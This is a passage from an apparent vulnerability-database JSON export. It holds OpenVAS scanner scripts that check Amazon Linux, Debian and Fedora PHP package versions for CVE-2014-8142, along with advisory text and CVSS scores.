NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mbstring\", rpm:\"php54-mbstring~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-cli\", rpm:\"php54-cli~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-soap\", rpm:\"php54-soap~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-process\", rpm:\"php54-process~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mysql\", rpm:\"php54-mysql~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-ldap\", rpm:\"php54-ldap~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mysqlnd\", rpm:\"php54-mysqlnd~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-tidy\", rpm:\"php54-tidy~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54\", rpm:\"php54~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-gd\", rpm:\"php54-gd~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-xml\", rpm:\"php54-xml~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-pgsql\", rpm:\"php54-pgsql~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-recode\", rpm:\"php54-recode~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n 
security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-intl\", rpm:\"php54-intl~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-dba\", rpm:\"php54-dba~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-enchant\", rpm:\"php54-enchant~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-imap\", rpm:\"php54-imap~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-fpm\", rpm:\"php54-fpm~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T14:30:09", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120450", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120450", "title": "Amazon Linux Local Check: alas-2015-464", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-464.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even 
the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120450\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:39 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2015-464\");\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019 .\");\n script_tag(name:\"solution\", value:\"Run yum update php55 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-464.html\");\n script_cve_id(\"CVE-2014-8142\", \"CVE-2004-1019\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n 
script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php55-xmlrpc\", rpm:\"php55-xmlrpc~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-embedded\", rpm:\"php55-embedded~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-dba\", rpm:\"php55-dba~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-pgsql\", rpm:\"php55-pgsql~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-gmp\", rpm:\"php55-gmp~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-enchant\", rpm:\"php55-enchant~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-soap\", rpm:\"php55-soap~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mbstring\", rpm:\"php55-mbstring~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-ldap\", rpm:\"php55-ldap~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-common\", rpm:\"php55-common~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-intl\", rpm:\"php55-intl~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-imap\", 
rpm:\"php55-imap~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-pdo\", rpm:\"php55-pdo~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mysqlnd\", rpm:\"php55-mysqlnd~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-debuginfo\", rpm:\"php55-debuginfo~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-pspell\", rpm:\"php55-pspell~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-opcache\", rpm:\"php55-opcache~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-gd\", rpm:\"php55-gd~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-recode\", rpm:\"php55-recode~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-process\", rpm:\"php55-process~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-cli\", rpm:\"php55-cli~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-devel\", rpm:\"php55-devel~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-xml\", rpm:\"php55-xml~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-tidy\", rpm:\"php55-tidy~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = 
isrpmvuln(pkg:\"php55-mcrypt\", rpm:\"php55-mcrypt~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-snmp\", rpm:\"php55-snmp~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-mssql\", rpm:\"php55-mssql~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-fpm\", rpm:\"php55-fpm~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-odbc\", rpm:\"php55-odbc~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55-bcmath\", rpm:\"php55-bcmath~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php55\", rpm:\"php55~5.5.20~2.94.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-20T16:40:41", "bulletinFamily": "scanner", "description": "Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream version\n5.4.36, which includes additional bug fixes, new features and possibly\nincompatible changes. Please refer to the upstream changelog for more\ninformation:\n\nhttp://php.net/ChangeLog-5.php#5.4.36\n\nTwo additional patches were applied\non top of the imported new upstream version. An out-of-bounds read flaw was\nfixed which could lead php5-cgi to crash. 
Moreover a bug with php5-pgsql in\ncombination with PostgreSQL 9.1 was fixed (Debian Bug #773182).", "modified": "2018-03-19T00:00:00", "published": "2014-12-31T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703117", "id": "OPENVAS:703117", "title": "Debian Security Advisory DSA 3117-1 (php5 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3117.nasl 9136 2018-03-19 13:08:02Z cfischer $\n# Auto-generated from advisory DSA 3117-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703117);\n script_version(\"$Revision: 9136 $\");\n script_cve_id(\"CVE-2014-8142\");\n script_name(\"Debian Security Advisory DSA 3117-1 (php5 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-03-19 14:08:02 +0100 (Mon, 19 Mar 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-12-31 00:00:00 +0100 (Wed, 31 Dec 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3117.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"php5 on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package is a metapackage that,\nwhen installed, guarantees that you have at least one of the four server-side\nversions of the PHP5 interpreter installed. 
Removing this package won't remove\nPHP5 from your system, however it may remove other packages that depend on this\none.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 5.4.36-0+deb7u1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream version\n5.4.36, which includes additional bug fixes, new features and possibly\nincompatible changes. Please refer to the upstream changelog for more\ninformation:\n\nhttp://php.net/ChangeLog-5.php#5.4.36\n\nTwo additional patches were applied\non top of the imported new upstream version. An out-of-bounds read flaw was\nfixed which could lead php5-cgi to crash. 
Moreover a bug with php5-pgsql in\ncombination with PostgreSQL 9.1 was fixed (Debian Bug #773182).\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.36-0+deb7u1\", 
rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", 
ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.36-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:19", "bulletinFamily": "scanner", "description": "Check the version of php", "modified": "2017-07-10T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868654", "title": "Fedora Update for php FEDORA-2014-17241", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2014-17241\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868654\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:39:17 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-8142\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for php FEDORA-2014-17241\");\n script_tag(name: \"summary\", value: \"Check the version of php\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"PHP is an HTML-embedded scripting language. PHP attempts to make it\neasy for developers to write dynamically generated web pages. PHP also\noffers built-in database integration for several commercial and\nnon-commercial database management systems, so writing a\ndatabase-enabled webpage with PHP is fairly simple. 
The most common\nuse of PHP coding is probably as a replacement for CGI scripts.\n\nThe php package contains the module (often referred to as mod_php)\nwhich adds support for the PHP language to Apache HTTP Server.\n\");\n script_tag(name: \"affected\", value: \"php on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-17241\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147131.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.6.4~2.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:42", "bulletinFamily": "scanner", "description": "Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream version\n5.4.36, which includes additional bug fixes, new features and possibly\nincompatible changes. 
Please refer to the upstream changelog for more\ninformation:\n\nhttp://php.net/ChangeLog-5.php#5.4.36\n\nTwo additional patches were applied\non top of the imported new upstream version. An out-of-bounds read flaw was\nfixed which could lead php5-cgi to crash. Moreover a bug with php5-pgsql in\ncombination with PostgreSQL 9.1 was fixed (Debian Bug #773182).", "modified": "2018-04-06T00:00:00", "published": "2014-12-31T00:00:00", "id": "OPENVAS:1361412562310703117", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703117", "title": "Debian Security Advisory DSA 3117-1 (php5 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3117.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 3117-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703117\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-8142\");\n script_name(\"Debian Security Advisory DSA 3117-1 (php5 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-12-31 00:00:00 +0100 (Wed, 31 Dec 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3117.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"php5 on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package is a metapackage that,\nwhen installed, guarantees that you have at least one of the four server-side\nversions of the PHP5 interpreter installed. 
